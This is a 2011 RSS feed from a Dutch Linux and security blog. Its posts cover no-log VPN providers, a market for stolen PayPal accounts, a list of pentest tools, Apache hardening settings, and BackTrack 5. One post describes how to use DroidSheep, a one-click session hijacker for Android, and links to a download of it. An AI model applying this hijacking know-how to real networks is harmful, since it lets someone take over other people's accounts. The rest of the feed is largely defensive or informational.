<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>..::HKaya::.. &#187; security</title>
	<atom:link href="http://www.huseyinkaya.nl/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.huseyinkaya.nl</link>
	<description>....Ubuntu.....Linux....Security.....Ik</description>
	<lastBuildDate>Sun, 23 Oct 2011 19:29:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>VPN services die echt anonimiteit aanbieden.</title>
		<link>http://www.huseyinkaya.nl/2011/10/08/vpn-services-die-echt-anonimiteit-aanbieden/</link>
		<comments>http://www.huseyinkaya.nl/2011/10/08/vpn-services-die-echt-anonimiteit-aanbieden/#comments</comments>
		<pubDate>Sat, 08 Oct 2011 08:50:38 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[anonimiteit]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[VPN]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=1016</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a></p>Tegenwoordig heb je genoeg keuze uit verschillende VPN services. Maar het probleem is dat niet alle VPN services echte anonimiteit aanbieden en logs bijhouden&#8230;]]></description>
			<content:encoded><![CDATA[<p>Tegenwoordig heb je genoeg keuze uit verschillende VPN services. Maar het probleem is dat niet alle VPN services echte anonimiteit aanbieden en logs bijhouden van alle gebruikers. Dit was bewezen nadat de VPN Service HideMyAss informatie vrijgaf van Lulzsec leden. Na deze nieuws bericht vroegen mensen zich af welke VPN services echt niets bewaren zoals beweerd wordt. Hieronder is een lijstje met VPN services die echt niets bewaren.</p>
<p>Als je veel gebruik maakt van hot-spots dan raad ik het aan om echt gebruik te maken van een VPN service. Het is al meerdere malen bewezen dat je niet veilig bent op hot-spots en vooral die gratis internet aanbieden, neem als voorbeeld McDonalds of in de trein. Je gegevens kunnen zo onderschept worden.</p>
<p>Onderstaande VPN services hebben gezegd dat ze echt niets loggen. Natuurlijk kun je nooit 100% weten zonder in hun systemen te kijken dus moeten we hun woorden vertrouwen. Onder elke service staat wat ze zelf hebben gezegd.</p>
<p><img class="size-full wp-image-1017 alignright" style="border-style: initial; border-color: initial;" title="btguard2" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/btguard2.jpg" alt="" width="180" height="50" /></p>
<p><strong>BTguard</strong></p>
<blockquote><p>“It’s technically unfeasible for us to maintain log files with the amount of connections we route,” BTguard explain. “We</p>
<p>estimate the capacity needed to store log files would be 4TB per day.”</p></blockquote>
<p>Proxy 5,33 euro per maand<br />
VPN 7,63 euro per maand</p>
<p><a href="http://btguard.com/">http://btguard.com/</a></p>
<p><strong>ItsHidden<img class="alignright size-full wp-image-1022" title="itshidden1" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/itshidden1.jpg" alt="" width="180" height="45" /></strong></p>
<blockquote><p>“No logs, they are not kept. Even system logs that do not directly link to users are rotated on an hourly basis.”</p></blockquote>
<p>9,99 Dollar per maand<br />
eenmalig 12.99 Dollar voor 1 maand<br />
eenmalig 24,99 Dollar voor 3 maanden<br />
eenmalig 44,99 Dollar voor 6 maanden</p>
<p><a href="http://itshidden.com/">http://itshidden.com/</a></p>
<p><strong>Ipredator<img class="alignright size-full wp-image-1023" title="ipredator" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/ipredator.jpg" alt="" width="180" height="51" /></strong></p>
<blockquote><p>“We don’t store the IP at all actually. It’s in temporary use for the session you have when you’re connected but that’s it. We’ve had very few issues with not having logs, but not keeping them makes it safer even for us since we can’t accidentally give out information about anyone.”</p></blockquote>
<p>15 Euro voor 3 maanden</p>
<p><a href="https://www.ipredator.se/">https://www.ipredator.se/</a></p>
<p><strong>Faceless<img class="alignright size-full wp-image-1024" title="faceless" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/faceless.jpg" alt="" width="180" height="50" /></strong></p>
<blockquote><p> “We do not log any IP addresses and no information about what data is accessed by our users, so we have no information that could be interesting to third-parties.”</p></blockquote>
<p>9.95 Dollar per maand<br />
19,95 Dollar voor 3 maanden</p>
<p><a href="http://faceless.me/">http://faceless.me/</a></p>
<p><strong>BlackVPN<img class="alignright size-full wp-image-1025" title="blackvpn" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/blackvpn.jpg" alt="" width="180" height="61" /></strong></p>
<blockquote><p>“We do not keep any logs about our users internet activities including which sites they access or what data they transfer. We also run log cleaners on our systems which removes the IPs from logs before they are written to disk,” the company told TorrentFreak.</p>
<p>“For tax and legal reasons we do store some billing information (name, email, country), but it is stored with a third-party and separate from the rest of BlackVPN.”</p>
<p>BlackVPN say they hold a username and email address of their subscribers and the times of connection and disconnection to their services along with bandwidth consumption. Logging is carried out as follows:</p>
<p>“On our Privacy Servers, NL &amp; LT we don’t log anything that can identify the user, but on our US &amp; UK server where we don’t allow sharing copyrighted materials we do log the internal RFC1918 IP that is assigned to the user at a specific time,” BlackVPN explain.</p>
<p>“So to clarify, we don’t log the real external IP of the user, just our RFC1918 internal one, this we have to do to comply with local laws and to be able to handle DMCAs.”</p></blockquote>
<p>TVPackage voor 7,50 per maand<br />
Privacy package voor 7,50 per maand<br />
Global package voor 9,50 per maand<br />
Één server naar keuze  voor 5 euro per maand</p>
<p><a href="https://www.blackvpn.com/">https://www.blackvpn.com/</a></p>
<p><strong>Mullvad<img class="alignright size-full wp-image-1026" title="mullvad" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/mullvad.jpg" alt="" width="180" height="37" /></strong></p>
<blockquote><p>“No. And we don’t see why anyone would. It would be dishonest towards our customers and mean *more* potential legal trouble.”</p></blockquote>
<p>5 euro per maand</p>
<p><a href="http://mullvad.net/en/">http://mullvad.net/en/</a></p>
<p>&nbsp;</p>
<p>Bron: <a href="http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/">TorrentFreak</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/10/08/vpn-services-die-echt-anonimiteit-aanbieden/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hoeveel is een gestolen Paypal account waard?</title>
		<link>http://www.huseyinkaya.nl/2011/10/05/hoeveel-is-een-gestolen-paypal-account-waard/</link>
		<comments>http://www.huseyinkaya.nl/2011/10/05/hoeveel-is-een-gestolen-paypal-account-waard/#comments</comments>
		<pubDate>Wed, 05 Oct 2011 19:43:09 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[paypal]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=1010</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a></p>Steeds meer mensen maken gebruik van Paypal om online betalingen te doen zoals op websites als Ebay. Omdat het een betaal systeem is wordt&#8230;]]></description>
			<content:encoded><![CDATA[<p>Steeds meer mensen maken gebruik van Paypal om online betalingen te doen zoals op websites als Ebay. Omdat het een betaal systeem is wordt het interessant voor hackers om deze van jou te stelen en misbruik van te maken. En dit wordt ook gedaan, er is een website opgedoken waar honderden complete Paypal accounts worden verkocht.</p>
<p>Volgens de informatie die verstreken is door Brian Krebs worden honderden gehackt Paypal accounts voor ene lage prijs verkocht. Niet-geverifieerde accounts worden per 100 stuks verkocht voor maar liefst 50$, 0,50$ per account is niet veel maar let wel op niet-geverifieerde accounts zijn accounts die niet verbonden zijn aan bank of credit-card. Dit betekend dat de hacker alleen is verbonden aan de saldo dat op de account staat, dus op=op.</p>
<p>Bij geverifieerde accounts ligt het weer anders, deze worden per stuk verkocht vanaf 2,50$ als de account meer dan 10$ heeft gaat de prijs omhoog. een account met 1000$ wordt makkelijk verkocht voor 45$. Je leest het goed 45$, zo goedkoop.</p>
<p>Nu vraag je wel af hoe deze accounts worden verkocht, nou simpel via een website en je raad het je betaalt met je Paypal account. Website is gelukkig voor nou offline gehaald, waarschijnlijk door de hosting. Hieronder is de screenshot van deze website.</p>
<p style="text-align: center;"><a href="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/paypalshop2.png" rel="lightbox[1010]"><img class="aligncenter size-full wp-image-1011" title="paypalshop2" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/10/paypalshop2.png" alt="" width="556" height="365" /></a></p>
<p>Zoals te zien is op de screenshot zijn niet alleen de mail adressen zichtbaar maar ook woonplaats en naam. Nu alle mail adressen zichtbaar zijn zou het logisch zijn dat Paypal deze adressen doorneemt en de accounts die verbonden zijn aan die account blokkeren zodat er geen misbruik van gemaakt wordt.</p>
<p>Brian denkt dat deze accounts gestolen zijn door middel van Phishing aanvallen en Trojans die op de computer van de doelwit bevindt. Site waar alle gestolen accounts opstaan was al een tijdje actief en is onbekend hoeveel deze persoon winst van gemaakt heeft. Gelukkig is de website niet meer online, maar voor hoelang?</p>
<p>Zoals te zien is worden onderschepte accounts voor bijna niets verkocht, persoonlijk had ik wel een hogere bedrag verwacht. Maar dit laat zien dat veel Paypal accounts gestolen worden zonder dat de gebruiker op de hoogte van is. Neem daarom de juiste maatregelen en log niet overal op je Paypal account.</p>
<p>Bron:<a href="http://krebsonsecurity.com/2011/10/how-much-is-that-phished-paypal-account/" target="_blank"> krebsonsecurity</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/10/05/hoeveel-is-een-gestolen-paypal-account-waard/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DroidSheep one-click session Hijacking</title>
		<link>http://www.huseyinkaya.nl/2011/09/21/droidsheep-one-click-session-hijacking/</link>
		<comments>http://www.huseyinkaya.nl/2011/09/21/droidsheep-one-click-session-hijacking/#comments</comments>
		<pubDate>Wed, 21 Sep 2011 11:38:12 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[DroidSheep]]></category>
		<category><![CDATA[hackertool]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=969</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a><a href="http://www.huseyinkaya.nl/category/tools/" title="Tools">Tools</a></p>DroidSheep is een one-click session hijacker voor android. Dit is vergelijkbaar met FireSheep. Het gebruik van DroidSheep is heel simpel, zoals de beschrijving het al zegt&#8230;]]></description>
			<content:encoded><![CDATA[<p>DroidSheep is een one-click session hijacker voor android. Dit is vergelijkbaar met FireSheep.</p>
<p>Het gebruik van DroidSheep is heel simpel, zoals de beschrijving het al zegt je hoeft maar op 1 knop te klikken namelijk START. Hierna gaat de applicatie het netwerk scannen en geeft de sessies van websites weer. Als je een sessie wilt overnemen hoef je alleen op de site te klikken en vervolgens op &#8220;Open Site&#8221;. Dit zal de ingebouwde browser openen met de sessie van een ander gebruiker. In principe ben je ingelogd als de slachtoffer zonder dat diegene het weet. Je kunt, zoals eerder geciteerd, vergelijken met FireSheep en Faceniff. Faceniff was alleen voor Facebook sessies.</p>
<p><strong>Wat heb je nodig</strong></p>
<p>- Een android toestel of tablet met android 2.1+<br />
- Root toegang<br />
- En natuurlijk Droidsheep</p>
<p>Ik heb in het kort DroidSheep getest en het werkte vrij snel en simpel, ik had o.a. sessies van Facebook en WordPress onderschept. Het werkte (gelukkig) niet op google sessies. Iedereen kan er gebruik van maken zonder enig kennis te hebben van hacken en dit maakt deze applicatie juist gevaarlijk.</p>
<p>Wat kun je hiertegen doen? dat zal de eerste vraag zijn van gebruikers. Als eerst vergeet nooit op &#8220;uitloggen&#8221; te klikken als je klaar bent, dit zal je sessie beëindigen en kan er niet meer misbruik van gemaakt worden. Als je een gratis internet toegang hebt let op wat je erop doet, als jij toegang hebt betekend dit dat ook anderen toegang op kunnen hebben met kwaadaardige bedoelingen. Als je een draadloze router hebt maak dan gebruik van WPA2 en <strong>GEEN</strong> WEP. Zo kun je tegengaan dat iemand onbevoegd toegang verleent tot je netwerk.</p>
<p>DroidSheep is niet gemaakt om andermans identiteit te stelen maar om aan te geven dat veel sites maar dan ook echt de meerderheid gevoelig zijn voor dit soort aanvallen. Gebruik deze applicatie dan ook alleen voor test doeleinden.</p>
<p class="warning">IK BEN NIET VERANTWOORDELIJK VOOR DE GEVOLGEN VAN DEZE APPLICATIE!</p>
<p>&nbsp;</p>
<p>Download Droidsheep: <a href="http://droidsheep.de/?page_id=23">http://droidsheep.de/?page_id=23</a></p>
<p>Hieronder een instructie video voor het installeren van Firesheep:</p>
<p><object width="360" height="600" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/LJi81WEXoOc?version=3&amp;hl=nl_NL" /><param name="allowfullscreen" value="true" /><embed width="360" height="600" type="application/x-shockwave-flash" src="http://www.youtube.com/v/LJi81WEXoOc?version=3&amp;hl=nl_NL" allowFullScreen="true" allowscriptaccess="always" allowfullscreen="true" /></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/09/21/droidsheep-one-click-session-hijacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux hacking tools voor beheerders</title>
		<link>http://www.huseyinkaya.nl/2011/09/09/linux-hacking-tools-voor-beheerders/</link>
		<comments>http://www.huseyinkaya.nl/2011/09/09/linux-hacking-tools-voor-beheerders/#comments</comments>
		<pubDate>Fri, 09 Sep 2011 13:32:20 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[Informatie]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=948</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/informatie/" title="Informatie">Informatie</a><a href="http://www.huseyinkaya.nl/category/linux/" title="Linux">Linux</a><a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a><a href="http://www.huseyinkaya.nl/category/tools/" title="Tools">Tools</a></p>Voor mijn opleiding en misschien zelfs mijn toekomstige baan moet ik veel penetratie testen en audits uitvoeren. Eerste vraag die altijd opkomt is welke&#8230;]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.huseyinkaya.nl/wp-content/uploads/2011/09/meta.png" rel="lightbox[948]"><br />
</a>Voor mijn opleiding en misschien zelfs mijn toekomstige baan moet ik veel penetratie testen en audits uitvoeren. Eerste vraag die altijd opkomt is welke technieken er gebruikt gaan worden, gelukkig hebben we een aantal beschikbare applicaties die we kunnen gebruiken. Ik ga hieronder de applicaties beschrijven die ik gebruik en tevens ook bekend zijn om hun prestaties. Meeste applicaties zijn ook te vinden in distributies die speciaal zijn gemaakt om penetratie testen uit te voeren zoals backTrack.</p>
<p><a href="http://www.huseyinkaya.nl/wp-content/uploads/2011/09/meta.png" rel="lightbox[948]"><img class="aligncenter size-full wp-image-949" style="border-style: initial; border-color: initial;" title="meta" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/09/meta.png" alt="" width="469" height="309" /></a></p>
<p>Met de juiste kennis en gebruik van deze applicaties zul je merken hoe krachtig een simpel applicatie kan zijn. Als je geen verstand hebt van deze applicaties raad ik het aan om voorbeelden op te zoeken en te oefenen. Gebruik deze applicaties wel alleen voor testdoeleinden.</p>
<h1><a href="http://www.insecure.org/nmap/" target="_blank">Nmap</a></h1>
<p><strong> </strong>Je hebt waarschijnlijk veel gehoord van Nmap wat geen verassing is. Het kan op eerste instantie op een simpele poort scanner lijken maar Nmap gaat een stap verder. Alle pakketten worden geanalyseerd en zo kan Nmap achterhalen welke OS er gebruikt wordt met de services. Nmap is beschikbaar in commandline als zowel in grafische omgeving.</p>
<h1><strong><a href="http://www.metasploit.com/" target="_blank">Metasploit Framework</a></strong></h1>
<p>Metasploit is een bekend framework die door duizenden mensen gebruikt wordt. Als je informatie zoekt over hacken dan zul je gegarandeerd Metasploit tegenkomen. Metasploit Framework bevat al zelf honderden bekende kwetsbaarheden maar het houd hier niet op deze framework wordt ook gebruikt om eigen kwetsbaarheden te schrijven.</p>
<h1><strong><a href="http://www.nessus.org/products/nessus" target="_blank">Nessus</a></strong></h1>
<p>Nessus is misschien een van de bekendste audit tools die er is, het wordt al ondertussen gebruikt door meer dan 75.000 bedrijven over de wereld. Je kunt met Nessus makkelijk en snel naar kwetsbaarheden zoeken op severs, computers en applicaties. Zodra je gebruik gaat maken van Nessus zul je merken hoe makkelijk alles zal gaan.</p>
<h1><strong><a href="http://cirt.net/nikto2" target="_blank">Nikto</a></strong></h1>
<p>Nikto is een server scanner die naar kwetsbaarheden scant op web servers. Tijdens het scan voert Nikto verschillende scripts uit om de kwetsbaarheid te testen. Je kunt Nikto ook uitbreiden d.m.v. Plugins.</p>
<h1><strong><a href="http://thc.org/thc-amap/" target="_blank">THC Amap</a></strong></h1>
<p>THC Amap is een nieuw soort applicatie om penetratie testen uit te voeren op een netwerk. Het doel van Amap is om snel en betrouwbaar informatie te geven op protocol niveau.</p>
<h1><strong><a href="http://www.ethereal.com/" target="_blank">Ethereal</a></strong></h1>
<p>Veel netwerk beheerders maken al gebruik van deze applicatie. Ethereal wordt vooral gebruikt voor analyse, troubleshooting en nieuwe protocol en software implementatie. Ethreal is een protocol analyzer die alle opties bevat die je verwacht en zelfs nog meer.</p>
<h1><strong><a href="http://thc.org/thc-hydra/" target="_blank">THC Hydra</a></strong></h1>
<p>Als eerste wat je leert is dat een wachtwoord krachtig moet zijn en niet makkelijk te kraken. Met Hydra kun je controleren of gebruikers geen gebruik maken van kwetsbare wachtwoorden. Hydra is dus een wachtwoord kraker die snel en betrouwbaar is plus het ondersteund meerdere protocollen en is makkelijk uit te breiden d.m.v. modules.</p>
<h1><strong><a href="http://www.openwall.com/john/" target="_blank">John the Ripper</a></strong></h1>
<p>Naast Hydra hebben we ok John the Ripper. John detecteert zwakke wachtwoorden door naar hashes te kijken van o.a. naar Windows hashes en Kerberos AFS en natuurlijk ook naar vele andere hashes.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/09/09/linux-hacking-tools-voor-beheerders/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Beveiliging Apache</title>
		<link>http://www.huseyinkaya.nl/2011/08/22/beveiliging-apache/</link>
		<comments>http://www.huseyinkaya.nl/2011/08/22/beveiliging-apache/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 11:25:40 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[beveiliging]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=924</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a><a href="http://www.huseyinkaya.nl/category/tutorials/" title="Tutorials">Tutorials</a></p>Dit is een belangrijk onderdeel, tenminste voor mij. De server zal continue in de aanval staan, dit zullen geautomatiseerde scripts zijn die de internet&#8230;]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 13px; font-weight: normal;">Dit is een belangrijk onderdeel, tenminste voor mij. De server zal continue in de aanval staan, dit zullen geautomatiseerde scripts zijn die de internet af scannen naar kwetsbare servers. Ze zullen voornamelijk brute-force aanvallen zijn. Hieronder zijn een paar simpele opties die met weinig inspanning uitgevoerd kunnen worden. </span></p>
<p><span style="font-size: 13px; font-weight: normal;"><a href="http://www.huseyinkaya.nl/wp-content/uploads/2011/08/apache_logo.png" rel="lightbox[924]"><img class="alignnone size-full wp-image-887" title="apache_logo" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/08/apache_logo.png" alt="" width="150" height="149" /></a><br />
</span></p>
<h2>Verberg apache-versie en alle andere gevoelige informatie</h2>
<p>Als je een apache webserver hebt geïnstalleerd kunnen internetgebruikers de versie van je apache opvragen, samen met je operating system (OS). Je zou denken dat het niet uitmaakt als anderen mijn apache-versie weten. Het risico bestaat echter dat een hacker exploits kan zoeken op de versie van je apache en als je vergeten bent om het te updaten kan het kwetsbaar zijn. Je kunt dit uitschakelen door een kleine aanpassing te brengen aan je config. Zoek naar <em>httpd.conf</em> en open die met je favoriete tekst editor en zoek of voeg de volgende lijnen toe:</p>
<pre lang="xorg_conf">ServerSignature off
ServerTokens Prod</pre>
<p><em>ServerSignature</em> Komt te staan als door apache automatisch genereerde pagina’s te voorschijn komen zoals 404 pagina’s.</p>
<p><em>ServerTokens</em> stuurt met http een response met de huidige versie en OS van apache. Door het op Prod te zetten stuurt apache alleen “Apache” waardoor hackers geen informatie krijgen van e Apache versie of je OS. Als je ook niet wilt dat Apache te komen staat dan moet je de source van Apache aanpassen zo kun je hackers ook misleiden.</p>
<h2>Ben er zeker van dat apache onder zijn eigen gebruiker en groep draait</h2>
<p>Bij sommige apache installaties draait Apache met de gebruiker “nobody”. Het is veiliger om een eigen gebruiker aan te maken voor Apache, dit zorgt voor een beter beveiliging voor je systeem. Als je meerdere services hebt draaien met nobody en als er een van die services overgenomen wordt door een kwetsbaarheid dan zijn gelijk alle services overgenomen. Je kunt dit aanpassen in <em>httpd.conf</em>:</p>
<pre lang="xorg_conf">User apache
Group apache</pre>
<p>Nu moet je apache opnieuw opstarten. Als deze gebruiker en groep niet bestaat zal apache ook niet starten.</p>
<h2>Zorg ervoor dat gebruikers niet buiten de webroot kunnen komen</h2>
<p>Apache maakt een webroot aan standaard /var/www. Je wilt dan dat gebruikers niet buiten deze map komen want dan krijgen ze toegang tot je server bestanden en dit wil iedereen voorkomen. Dit is makkelijk op te lossen door je apache instellingen aan te passen. Hier onder is een voorbeeld voor je webroot instellingen (we gaan ervan uit dat /var/www je webroot is):</p>
<pre lang="html4strict">&lt;Directory /&gt; 
   Order Deny, Allow 
   Deny From All 
   Options None 
   AllowOverride None
&lt;/Directory&gt;
&lt;Directory /var/www&gt; 
   Order Allow, Deny 
   Allow from all
&lt;/Directory&gt;</pre>
<h2>Schakel directory listing uit</h2>
<p>Met directory listing hebben gebruikers de mogelijkheid een overzicht te krijgen van de inhoud van een map. Dit is niet wat we willen tenzij je wilt dat gebruikers een inzage hebben. Om deze optie uit te zetten moet je weer naar je instellingen kijken van je webroot en er een optie erbij zetten:</p>
<pre lang="xorg_conf">Options –includes</pre>
<h2>Gebruik mod_security</h2>
<p><a href="http://www.modsecurity.org/">mod_security</a> is een Apache module die je kan helpen bij het beveiligen van je Apache server, mod_security is geschreven door Ivan Ristic die ook de schrijver is van <a href="http://www.amazon.com/exec/obidos/ASIN/0596007248/">Apache security</a> voor O’reilly. Met Mod_security kun je het volgende doen: <br class="spacer_" /></p>
<p>-         Simple filtering<br />
-         Reguliere expressie filtering<br />
-         URL encoding validatie<br />
-         Unicode Encoding validatie<br />
-         Auditing<br />
-         Null byte aanval preventie<br />
-         Upload memory limit<br />
-         Server identity masking<br />
-         En nog meer</p>
<h2>Schakel ongebruikte modules uit</h2>
<p>Met Apache komen een paar standaard modules die je waarschijnlijk niet allemaal nodig zult hebben. Je kunt meer over Modules lezen <a href="http://httpd.apache.org/docs/2.0/mod/">Module documentatie</a> er staat ook uiteg erbij over de modules zo weet je wat een module doet en dan kun e beslissen of je het nodig hebt of niet. Eerst moet je kijken welke modules er standaard geladen worden deze kun je vinden in <em>httpd.conf</em> bestand. Lijnen die starten met LoadModule zijn de modules die geladen, waar een # voor staat worden niet geladen. Om een snel overzicht te krijgen over modules die geladen worden kun je grep gebruiken (we gaan ervan uit dat je op dezelfde locatie bevind als de httpd.conf):   <br class="spacer_" /></p>
<div>
<div>
<div><em> </em></div>
<pre lang="bash">Grep LoadModule httpd.conf</pre>
<p>Hier zijn een paar Modules die standaard mee komen maar vaak niet gebruikt worden: mod_imap, mod_include, mod_info, mod_userdir, mod_status, mod_cgi en mod_autoindex.</p>
<h2>Zorg dat alleen root toegang heeft tot apache instellingen</h2>
<p>Je Wilt niet dat andere gebruikers toegang hebben tot je Apache instellingen daarom is het ok beste om alleen root toegang tegeven (We gaan ervan uit dat apache in /usr/local/apache is geïnstalleerd) <br class="spacer_" /></p>
<pre lang="bash">Chown –R root:root /usr/local/apache
Chmod –R o-rwx /usr/local/apache</pre>
<h2>Verlaag het timeout</h2>
<p>Timout is het tijd waar Apache op drie dingen kan wachten 1. tijd die tussen GET request zit 2. tijd tussen TCP pakketen met POST of PUT request 3. De tijd tussen ACK’s van TCP. Standaard staat het timeout op 300 seconden. Als dit hoog staat kunnen mensen denial of service aanvallen doen, tegenwoordig is internet snel genoeg om deze optie lager te zetten. Het beste is om het op 45 te zetten. <br class="spacer_" /></p>
<pre lang="xorg_conf">Timeout 45</pre>
<h2>Limiteer grote requests</h2>
<p>In apache zit een optie om een limit in te stellen voor requests. Als dit hoog staat loop je risico om eerder een slachtoffer te zijn van een denial of service. <br class="spacer_" /></p>
<p>Als eerst kun je kijken naar  <em>LimitRequestBody</em> deze staat automatisch op Unlimited. Als je een limit op uploads wilt zetten bijv. niet groter dan 1MB kun je de instelling als volgt zetten <br class="spacer_" /></p>
<pre lang="xorg_conf">LimitRequesBody 1048576</pre>
<p>Wil je het lager zetten kan het ook. Als je niet bestanden hebt die groot zijn is het dan ook het beste om deze zo laag mogelijk te zetten.</p>
<h2>Toegang voor bepaalde netwerken</h2>
<p>Als je Apache wilt gebruiken voor alleen intern netwerk of voor bepaalde personen dan kun je in de instellingen aangeven. Je kunt dan twee opties meegeven, je kunt een blok IP adressen kiezen of zelf een IP adres aangeven. Je kunt de Optie “Allow from” optie bij je webroot zetten. Hieronder is een voorbeeld (we nemen het blok 176.16 als voorbeeld):</p>
<pre lang="xorg_conf">Order Deny, Allow
Deny from all
Allow from 176.16.0.0/16</pre>
<p>Of IP</p>
<pre lang="xorg_conf">Order Deny,Allow
Deny from all
Allow from 127.0.0.1</pre>
<h2>Gebruik apache in chroot omgeving</h2>
<p><em>Chroot</em> zorgt ervoor dat een programma in een geïsoleerde ruimte kan werken zonder enig effect te hebben op andere programma’s of server.</p>
<p>Het kan lastig zijn om <a href="http://penguin.triumf.ca/chroot.html">apache in chroot</a> te draaien vanwege benodigde libraries. Je kunt ook mod_security gebruiken om het makkelijker toe te passen. Om chroot te gebruiken met od_security moet je de instellingen ervan aanpassen, zet de volgende lijn erbij en restart Apache:</p>
<pre lang="xorg_conf">SecChrootDir /chroot/apache</pre>
</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/08/22/beveiliging-apache/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Backtrack 5 Revolution</title>
		<link>http://www.huseyinkaya.nl/2011/03/23/backtrack-5-revolution/</link>
		<comments>http://www.huseyinkaya.nl/2011/03/23/backtrack-5-revolution/#comments</comments>
		<pubDate>Wed, 23 Mar 2011 13:34:25 +0000</pubDate>
		<dc:creator>Michel</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=795</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/tumblog/articles/">Articles</a></p>De ontwikkelaars van BackTrack zijn hard bezig aan alweer versie vijf van dit programma. De laatste tijd ontvingen ze steeds meer vragen over deze&#8230;]]></description>
			<content:encoded><![CDATA[<p>De ontwikkelaars van BackTrack zijn hard bezig aan alweer versie vijf van dit programma. De laatste tijd ontvingen ze steeds meer vragen over deze versie en hebben ze besloten om wat meer bekend te maken over BT 5. BackTrack 5 staat ook bekend on codenaam “revolution”. Dit is niet zomaar een uit de lucht gegrepen naam, er zijn redenen voor.</p>
<p>BT 5 is gebasseerd op Ubuntu Lucid (10.04 LTS) en zal zowel 32bit als 64bit gaan ondersteunen. Er is ondersteuning voor KDE 4, Cnome en Fluxbox door middel van downloadbare ISO bestanden van iedere desktop omgeving. Alle beschikbare tools werken naadloos samen met alle desktop omgevingen, dus ook het start menu.</p>
<p><a href="http://www.huseyinkaya.nl/wp-content/uploads/2011/03/bt5-teaser011.png" rel="lightbox[795]"><img class="aligncenter size-medium wp-image-800" title="bt5-teaser01" src="http://www.huseyinkaya.nl/wp-content/uploads/2011/03/bt5-teaser011-300x225.png" alt="" width="300" height="225" /></a></p>
<p>Misschien wel de meest belangrijke aanpassing aan BackTrack revolution is dat dit de eerste versie is waarvan de volledige broncode in de repositories zit. Dit houdt in dat BackTrack 5 revolution nu officieel tot de open-source groep hoort. Bij versie 4 waren er nog enkele license problemen.</p>
